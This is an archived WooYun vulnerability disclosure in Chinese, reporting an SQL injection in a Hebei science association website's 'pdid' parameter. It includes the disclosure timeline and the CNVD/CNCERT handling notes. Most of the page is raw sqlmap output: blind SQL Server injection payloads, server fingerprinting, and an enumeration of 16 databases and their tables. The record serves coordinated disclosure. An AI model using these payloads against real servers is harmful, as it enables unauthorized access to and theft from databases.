乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
到底这网站属于河南河北省科协信息中心还是?
http://**.**.**.**/pdnr.aspx?pdid=294 (GET)
<code>sqlmap identified the following injection points with a total of 62 HTTP(s) requests:---Parameter: pdid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pdid=294 AND 3529=3529 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: pdid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pdid=294 AND 3529=3529 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: pdid=294 AND 4025=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005available databases [16]:[*] ASPNETDB[*] CPST_MOVIE[*] HAST[*] hbkxoa[*] hbqd[*] master[*] model[*] msdb[*] nckp[*] news[*] Northwind[*] psschool[*] pubs[*] QMSZ[*] tempdb[*] XYIR
</code>
available databases [16]:[*] ASPNETDB[*] CPST_MOVIE[*] HAST[*] hbkxoa[*] hbqd[*] master[*] model[*] msdb[*] nckp[*] news[*] Northwind[*] psschool[*] pubs[*] QMSZ[*] tempdb[*] XYIRDatabase: nckp+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.FS_SS_Stat | 6221 || dbo.FS_AD_Source | 2779 || dbo.FS_MF_Login_Log | 242 || dbo.FS_NS_News | 211 || dbo.FS_MF_Lable | 100 || dbo.FS_NS_NewsClass | 67 || dbo.FS_MF_Oper_Log | 38 || dbo.FS_MF_Labestyle | 16 || dbo.FS_NS_General | 10 || dbo.FS_MF_Sub_Sys | 9 || dbo.FS_AD_Info | 7 || dbo.FS_AD_TxtInfo | 7 || dbo.FS_FL_FrendList | 7 || dbo.FS_MF_Admin | 7 || dbo.FS_MF_AdminGroup | 5 || dbo.FS_MF_LableClass | 3 || dbo.FS_NS_TodayPic | 2 || dbo.FS_AD_Class | 1 || dbo.FS_DS_SysPara | 1 || dbo.FS_FL_SysPara | 1 || dbo.FS_MF_Config | 1 || dbo.FS_NS_SysParam | 1 || dbo.FS_SS_SysPara | 1 || dbo.FS_VS_SysPara | 1 || dbo.FS_WS_Config | 1 |+--------------------------------------------------+---------+Database: QMSZ+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.FS_SS_Stat | 7007 || dbo.FS_NS_News | 351 || dbo.FS_MF_Login_Log | 152 || dbo.FS_MF_Lable | 89 || dbo.FS_NS_NewsClass | 82 || dbo.FS_MF_Oper_Log | 43 || dbo.FS_MF_Labestyle | 16 || dbo.FS_NS_General | 12 || dbo.FS_MF_Sub_Sys | 9 || dbo.FS_MF_AdminGroup | 5 || dbo.FS_MF_Admin | 4 || dbo.FS_MF_LableClass | 3 || dbo.FS_NS_TodayPic | 2 || dbo.FS_DS_SysPara | 1 || dbo.FS_FL_SysPara | 1 || dbo.FS_MF_Config | 1 || dbo.FS_NS_SysParam | 1 || dbo.FS_SS_SysPara | 1 || dbo.FS_VS_SysPara | 1 || dbo.FS_WS_Config | 1 |+--------------------------------------------------+---------+Database: ASPNETDB+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.aspnet_UsersInRoles | 16 || dbo.vw_aspnet_UsersInRoles | 16 || dbo.aspnet_SchemaVersions | 6 || dbo.aspnet_Membership | 5 || dbo.aspnet_Users | 5 || dbo.vw_aspnet_MembershipUsers | 5 || dbo.vw_aspnet_Users | 5 || dbo.aspnet_Roles | 4 || dbo.vw_aspnet_Roles | 4 || dbo.aspnet_Applications | 1 || dbo.vw_aspnet_Applications | 1 |+--------------------------------------------------+---------+Database: CPST_MOVIE+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.channel_files | 1797 || dbo.channel_files_details | 1797 || dbo.file_info | 1667 || dbo.column_index | 21 || dbo.column_info | 19 || dbo.channel_info | 12 || dbo.channel_info_view | 12 || dbo.recommend_site | 11 || dbo.zt_qunzhong | 4 || dbo.channel_status | 2 || dbo.channel_type | 2 || dbo.advice | 1 || dbo.marquee | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.RTblRelships | 6910 || dbo.RTblIfaceHier | 3345 || dbo.RTblVersionAdminInfo | 2328 || dbo.RTblVersions | 2328 || dbo.RTblNamedObj | 2191 || dbo.RTblIfaceMem | 1186 || dbo.RTblPropDefs | 794 || dbo.RTblClassDefs | 537 || dbo.RTblIfaceDefs | 452 || dbo.RTblProps | 392 || dbo.MSdbms_datatype_mapping | 325 || dbo.sysdatatypemappings | 325 || dbo.RTblRelColDefs | 320 || dbo.MSdbms_map | 248 || dbo.MSdatatype_mappings | 174 || dbo.RTblRelshipDefs | 144 || dbo.MSdbms_datatype | 141 || dbo.RTblParameterDef | 136 || dbo.backupfile | 74 || dbo.RTblSites | 38 || dbo.backupset | 37 || dbo.backupmediafamily | 36 || dbo.backupmediaset | 36 || dbo.RTblRelshipProps | 28 || dbo.backupfilegroup | 21 || dbo.syscategories | 21 || dbo.RTblTypeLibs | 16 || dbo.restorefile | 10 || dbo.syssubsystems | 10 || dbo.sysalerts | 9 || dbo.MSdbms | 7 || dbo.sysmail_configuration | 7 || dbo.restorefilegroup | 5 || dbo.restorehistory | 5 || dbo.sysdtscategories | 3 || dbo.sysdtspackagefolders90 | 2 || dbo.RTblDatabaseVersion | 1 || dbo.sysdbmaintplans | 1 || dbo.sysmail_servertype | 1 || dbo.sysoriginatingservers_view | 1 || dbo.syssessions | 1 || dbo.systargetservers_view | 1 |+--------------------------------------------------+---------+Database: pubs+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.roysched | 86 || dbo.employee | 43 || dbo.titleauthor | 25 || dbo.titleview | 25 || dbo.authors | 23 || dbo.sales | 21 || dbo.titles | 18 || dbo.jobs | 14 || dbo.pub_info | 8 || dbo.publishers | 8 || dbo.stores | 6 || dbo.discounts | 3 |+--------------------------------------------------+---------+Database: XYIR+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.PD_PLAYLIST | 518142 || dbo.MOD_IPDB | 175220 || dbo.ST_STFW | 21557 || dbo.ST_LOG | 3317 || dbo.ST_LMFW | 1456 || dbo.ST_PDFW | 653 || dbo.PD_MTWJ | 591 || dbo.PD_PDNR | 276 || dbo.PD_PDLM | 86 || dbo.PD_LMQX | 79 || dbo.MOD_XTBJ | 38 || dbo.MOD_XTJS | 26 || dbo.MOD_BJQX | 19 || dbo.MOD_YHJS | 14 || dbo.MOD_ZZBM | 12 || dbo.ST_WJLX | 10 || dbo.MOD_XTYH | 9 || dbo.MOD_XTQX | 7 || dbo.PD_PRODUCT | 5 || dbo.MOD_XTCS | 4 || dbo.PD_PDLJ | 3 || dbo.AP_TMGL | 2 || dbo.PD_LMSJ | 2 || dbo.ST_CUT | 2 || dbo.MOD_BACKUP | 1 || dbo.MOD_IPGL | 1 || dbo.PD_PDYD | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 || sys.dm_os_memory_objects | 45664 || sys.dm_os_buffer_descriptors | 34677 || sys.dm_os_sublatches | 13184 || sys.syscolumns | 11165 || sys.dm_os_memory_cache_entries | 11003 || sys.dm_exec_query_stats | 8795 || sys.all_parameters | 6705 || sys.system_parameters | 6697 || sys.syscacheobjects | 5696 || sys.dm_os_ring_buffers | 5173 || sys.dm_exec_cached_plans | 4867 || sys.trace_subclass_values | 4722 || sys.all_columns | 4255 || sys.trace_event_bindings | 3958 || sys.system_columns | 3696 || sys.syscomments | 2756 || dbo.spt_values | 2346 || sys.all_objects | 1816 || sys.sysobjects | 1816 || sys.system_objects | 1741 || sys.database_permissions | 1622 || sys.syspermissions | 1621 || sys.sysprotects | 1619 || sys.all_sql_modules | 1596 || sys.system_sql_modules | 1589 || sys.dm_os_virtual_address_dump | 1297 || sys.dm_os_performance_counters | 1032 || sys.sysperfinfo | 1032 || sys.system_internals_partition_columns | 694 || sys.columns | 559 || sys.dm_db_index_usage_stats | 457 || sys.dm_exec_query_transformation_stats | 376 || sys.stats_columns | 289 || sys.all_views | 284 || sys.system_views | 284 || sys.index_columns | 219 || sys.sysindexkeys | 219 || sys.dm_os_memory_clerks | 217 || sys.dm_os_wait_stats | 194 || sys.event_notification_event_types | 193 || sys.dm_os_memory_cache_clock_hands | 182 || sys.sysindexes | 172 || sys.trace_events | 171 || sys.stats | 165 || sys.dm_os_latch_stats | 136 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.system_internals_allocation_units | 112 || sys.indexes | 102 || sys.dm_db_partition_stats | 101 || sys.partitions | 101 || sys.system_internals_partitions | 101 || sys.system_components_surface_area_configuration | 98 || sys.xml_schema_facets | 97 || sys.xml_schema_components | 93 || sys.dm_os_memory_cache_counters | 91 || sys.dm_os_threads | 82 || sys.xml_schema_types | 77 || sys.objects | 75 || sys.dm_os_worker_local_storage | 74 || sys.dm_os_workers | 74 || sys.dm_os_loaded_modules | 70 || sys.trace_columns | 65 || sys.configurations | 62 || sys.sysconfigures | 62 || sys.syscurconfigs | 62 || sys.dm_os_memory_cache_hash_tables | 61 || sys.dm_os_memory_pools | 54 || INFORMATION_SCHEMA.COLUMNS | 50 || sys.fulltext_document_types | 50 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || sys.dm_os_tasks | 40 || sys.dm_exec_query_optimizer_info | 38 || sys.syslanguages | 33 || sys.master_files | 32 || sys.sysaltfiles | 32 || sys.dm_db_missing_index_details | 30 || sys.dm_db_missing_index_group_stats | 30 || sys.dm_db_missing_index_groups | 30 || sys.sysprocesses | 29 || sys.dm_db_session_space_usage | 28 || sys.dm_db_task_space_usage | 28 || sys.server_principals | 27 || sys.systypes | 27 || sys.types | 27 || sys.dm_exec_sessions | 26 || sys.server_permissions | 25 || sys.dm_exec_requests | 21 || sys.securable_classes | 21 || sys.trace_categories | 21 || sys.dm_tran_active_transactions | 20 || sys.dm_tran_database_transactions | 20 || sys.dm_os_schedulers | 19 || sys.syslogins | 18 || sys.fulltext_languages | 17 || sys.xml_schema_component_placements | 17 || sys.database_mirroring | 16 || sys.database_principals | 16 || sys.database_recovery_status | 16 || sys.databases | 16 || sys.sysdatabases | 16 || sys.sysusers | 16 || INFORMATION_SCHEMA.SCHEMATA | 14 || sys.schemas | 14 || sys.service_message_types | 14 || sys.xml_schema_attributes | 14 || sys.dm_os_stacks | 13 || sys.dm_os_waiting_tasks | 12 || sys.service_contract_message_usages | 11 || sys.dm_tran_locks | 10 || sys.sql_logins | 10 || sys.syslockinfo | 10 || INFORMATION_SCHEMA.PARAMETERS | 8 || sys.parameters | 8 || sys.procedures | 8 || INFORMATION_SCHEMA.ROUTINES | 7 || sys.sql_modules | 7 || INFORMATION_SCHEMA.TABLES | 6 || sys.service_contracts | 6 || sys.tables | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || sys.endpoints | 5 || sys.certificates | 4 || sys.dm_os_hosts | 4 || sys.extended_procedures | 4 || sys.server_role_members | 4 || dbo.MSreplication_options | 3 || sys.dm_clr_properties | 3 || sys.dm_exec_connections | 3 || sys.identity_columns | 3 || sys.internal_tables | 3 || sys.login_token | 3 || sys.service_queue_usages | 3 || sys.service_queues | 3 || sys.services | 3 || sys.syssegments | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.dm_broker_queue_monitors | 2 || sys.dm_fts_memory_pools | 2 || sys.key_encryptions | 2 || sys.service_contract_usages | 2 || sys.sysfiles | 2 || sys.tcp_endpoints | 2 || dbo.spt_monitor | 1 || INFORMATION_SCHEMA.ROUTINE_COLUMNS | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_db_file_space_usage | 1 || sys.dm_exec_background_job_queue_stats | 1 || sys.dm_os_sys_info | 1 || sys.dm_tran_current_transaction | 1 || sys.filegroups | 1 || sys.linked_logins | 1 || sys.routes | 1 || sys.servers | 1 || sys.sql_dependencies | 1 || sys.symmetric_keys | 1 || sys.sysconstraints | 1 || sys.sysdepends | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysoledbusers | 1 || sys.sysservers | 1 || sys.traces | 1 || sys.user_token | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: news+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.FS_SS_Stat | 431659 || dbo.FS_AD_Source | 31960 || dbo.FS_MF_Login_Log | 14778 || dbo.FS_NS_News | 5652 || dbo.FS_MF_Admin | 172 || dbo.FS_MF_Lable | 139 || dbo.FS_NS_NewsClass | 84 || dbo.FS_NS_General | 82 || dbo.FS_MF_Oper_Log | 77 || dbo.FS_NS_TodayPic | 59 || dbo.FS_MF_Labestyle | 24 || dbo.FS_AD_Info | 21 || dbo.FS_AD_TxtInfo | 21 || dbo.FS_MF_Sub_Sys | 9 || dbo.FS_VS_Items | 7 || dbo.FS_MF_AdminGroup | 5 || dbo.FS_MF_LableClass | 4 || dbo.FS_MF_POP | 4 || dbo.FS_DS_SysPara | 1 || dbo.FS_FL_SysPara | 1 || dbo.FS_MF_Config | 1 || dbo.FS_MF_StyleClass | 1 || dbo.FS_NS_SysParam | 1 || dbo.FS_SS_SysPara | 1 || dbo.FS_VS_Class | 1 || dbo.FS_VS_SysPara | 1 || dbo.FS_VS_Theme | 1 || dbo.FS_WS_Config | 1 |+--------------------------------------------------+---------+Database: HAST+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.w_logsite | 201841 || dbo.w_product | 5981 || dbo.w_lmqx | 426 || dbo.w_xtlm | 191 || dbo.w_bjqx | 173 || dbo.s_xtzh | 47 || dbo.d_xtlm | 27 || dbo.d_bjqx | 25 || dbo.s_xtfz | 25 || dbo.d_product | 23 || dbo.w_xtbj | 21 || dbo.d_xtwj | 20 || dbo.d_xtbj | 16 || dbo.d_lmqx | 9 || dbo.s_xtcs | 2 || dbo.w_sitecount | 1 |+--------------------------------------------------+---------+Database: hbkxoa+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.document | 1262 |+--------------------------------------------------+---------+Database: hbqd+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.ST_YHZH | 972 || dbo.ST_TBZL | 769 || dbo.ST_TBZT | 712 || dbo.ST_YHDW | 140 || dbo.group_unit | 16 || dbo.sysdiagrams | 1 |+--------------------------------------------------+---------+Database: Northwind+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.[Order Details Extended] | 2155 || dbo.[Order Details] | 2155 || dbo.Invoices | 2155 || dbo.[Order Subtotals] | 830 || dbo.[Orders Qry] | 830 || dbo.Orders | 830 || dbo.[Summary of Sales by Quarter] | 809 || dbo.[Summary of Sales by Year] | 809 || dbo.[Customer and Suppliers by City] | 120 || dbo.Customers | 91 || dbo.[Quarterly Orders] | 86 || dbo.[Product Sales for 1997] | 77 || dbo.[Sales by Category] | 77 || dbo.Products | 77 || dbo.[Alphabetical list of products] | 69 || dbo.[Current Product List] | 69 || dbo.[Products by Category] | 69 || dbo.[Sales Totals by Amount] | 66 || dbo.Territories | 53 || dbo.EmployeeTerritories | 49 || dbo.Suppliers | 29 || dbo.[Products Above Average Price] | 25 || dbo.Employees | 9 || dbo.[Category Sales for 1997] | 8 || dbo.Categories | 8 || dbo.Region | 4 || dbo.Shippers | 3 |+--------------------------------------------------+---------+Database: psschool+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.file_info | 344 || dbo.channel_files | 204 || dbo.column_index | 21 || dbo.column_info | 19 || dbo.channel_info | 18 || dbo.channel_info_view | 18 || dbo.news | 18 || dbo.recommend_site | 11 || dbo.channel_status | 2 || dbo.channel_type | 2 || dbo.advice | 1 || dbo.marquee | 1 |+--------------------------------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s)
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 17:58
CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。
暂无